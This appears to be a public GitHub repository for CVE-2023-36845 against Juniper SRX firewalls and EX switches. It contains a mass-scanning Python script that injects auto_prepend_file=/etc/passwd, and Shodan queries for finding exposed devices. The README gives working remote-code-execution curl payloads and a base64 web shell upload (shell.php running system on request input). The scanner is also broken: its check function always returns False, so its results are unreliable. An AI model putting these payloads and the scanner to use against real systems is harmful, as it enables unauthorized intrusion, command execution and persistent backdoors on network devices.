├── LICENSE ├── CVE-2023-36845.py └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 kljunowsky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /CVE-2023-36845.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import requests 4 | import argparse 5 | import urllib3 6 | 7 | urllib3.disable_warnings() 8 | 9 | def check_vulnerability(url): 10 | try: 11 | response = requests.post(url, data={'auto_prepend_file': '/etc/passwd'}, verify=False, timeout=5) 12 | if 'root:' in response.text: 13 | is_vuln = True 14 | else: 15 | is_vuln = False 16 | except requests.RequestException as e: 17 | pass 18 | return False 19 | 20 | def main(): 21 | parser = argparse.ArgumentParser(description='Check vulnerability of domains/IPs in a file.') 22 | parser.add_argument('-f', '--file', type=str, required=True, help='Input file containing domains or IPs') 23 | parser.add_argument('-o', type=str, required=True, help='Output file to write results') 24 | 25 | args = parser.parse_args() 26 | 27 | with open(args.file, 'r') as f, open(args.o, 'w') as out: 28 | for host in f: 29 | host = host.strip() 30 | if host: 31 | is_vuln = False 32 | for schema in ['http://', 'https://']: 33 | url = f"{schema}{host}/?PHPRC=/dev/fd/0" 34 | if check_vulnerability(url): 35 | is_vuln = True 36 | break 37 | result = f"{host} is vulnerable to CVE-2023-36845" if is_vuln else f"{host} is not vulnerable to CVE-2023-36845" 38 | out.write(result + '\n') 39 | print(result) 40 | 41 | if __name__ == '__main__': 42 | main() 43 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

CVE-2023-36845

2 |

3 | 4 |

5 | 6 | 7 | 8 | ## Description 9 | 10 | CVE-2023-36845 represents a notable PHP environment variable manipulation vulnerability that impacts Juniper SRX firewalls and EX switches. While Juniper has categorized this vulnerability as being of medium severity, in this article, we will elucidate how this singular vulnerability can be leveraged for remote, unauthenticated code execution. 11 | 12 | ## Search - Shodan 13 | ``` 14 | title:"Juniper Web Device Manager" 15 | ``` 16 | image 17 | 18 | ``` 19 | title:"Juniper" http.favicon.hash:2141724739 20 | ``` 21 | 22 | image 23 | 24 | ## Usage 🛠 25 | Detection 26 | ``` 27 | python3 CVE-2023-36845.py -f targets.txt -o output.txt 28 | ``` 29 | 30 | ## RCE 🧨 31 | ### Option 1 32 | Utilizing any protocol wrapper in conjunction with `auto_prepend_file` is feasible. The most suitable choice for this operation is the `data://` protocol, which allows inline provision of the "secondary file". Here's a sophisticated representation of this exploit, executing the embedded `` within the `data://` scheme: 33 | 34 | ``` 35 | curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="' 36 | ``` 37 | Execute `whoami` command 38 | 39 | `` 40 | ``` 41 | curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="' 42 | ``` 43 | 44 | ### Option 2 45 | Upload a file 46 | 47 | `"; $cmd = ($_REQUEST[cmd]); system($cmd); echo ""; die; }?>` 48 | 49 | ``` 50 | $ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo= 51 | ", "csize": 110}]' 52 | ``` 53 | 54 | ## Parameters 🧰 55 | 56 | Parameter | Description | Type 57 | ------------ | ------------- | ------------- 58 | --file / -f | Input targets file | File 59 | -o | Output file | File 60 | 61 | ## Contact Me 📇 62 | 63 | [LinkedIn - Milan Jovic](https://www.linkedin.com/in/milan-jovic-sec/) 64 | 65 | 66 | --------------------------------------------------------------------------------